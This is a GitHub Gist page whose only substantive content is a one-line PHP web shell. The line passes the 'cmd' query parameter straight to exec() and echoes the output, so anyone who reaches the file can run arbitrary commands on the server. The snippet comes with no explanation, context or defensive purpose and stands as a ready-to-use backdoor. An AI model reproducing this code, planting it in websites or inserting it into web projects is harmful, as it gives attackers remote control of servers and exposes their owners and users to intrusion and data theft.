Skip to content

Instantly share code, notes, and snippets.

@pix
Created May 20, 2019 09:01
Show Gist options
  • Save pix/f2bd4b4bad7f75e8ac7009059b78b8cc to your computer and use it in GitHub Desktop.
Save pix/f2bd4b4bad7f75e8ac7009059b78b8cc to your computer and use it in GitHub Desktop.
<?php $cmd=$_GET['cmd']; echo exec($cmd); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment